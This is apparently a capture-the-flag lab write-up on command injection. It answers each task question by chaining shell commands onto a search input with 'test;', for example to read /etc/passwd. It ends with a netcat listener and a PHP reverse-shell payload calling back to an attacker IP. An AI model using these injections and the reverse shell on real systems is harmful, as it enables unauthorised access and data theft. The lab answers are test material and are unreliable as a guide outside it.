Task 5
What strange text file is in the website root directory?
Section titled “What strange text file is in the website root directory? ”test; lsAnswer
Section titled “Answer ”drpepper.txt
How many non-root/non-service/non-daemon users are there?
Section titled “How many non-root/non-service/non-daemon users are there? ”test; cat /etc/passwdAnswer
Section titled “Answer ”0
What user is this app running as?
Section titled “What user is this app running as? ”test; whoamiAnswer
Section titled “Answer ”www-data
What is the user’s shell set as?
Section titled “What is the user’s shell set as? ”test; cat /etc/passwd |grep www-dataAnswer
Section titled “Answer ”/usr/sbin/nologin
What version of Ubuntu is running?
Section titled “What version of Ubuntu is running? ”test ; cat /etc/os-release
or
test ; lsb_release -aAnswer
Section titled “Answer ”18.04.4
Print out the MOTD. What favorite beverage is shown?
Section titled “Print out the MOTD. What favorite beverage is shown? ”test ; locate 00-headertest ; cat /etc/update-motd.d/00-headerAnswer
Section titled “Answer ”Dr Pepper
EXTRA
Section titled “EXTRA ”Spawn remote shell in that machine
Section titled “Spawn remote shell in that machine ”- On your machine
- Open a localport on your machine
nc -lvnp 9001- On vulnerable webpage
- Spawn this remote shell in the search input.
Replace 10.18.1.159 with your own VPN IP
test; php -r '$sock=fsockopen("10.18.1.159",9001);`sh <&3 >&3 2>&3`;'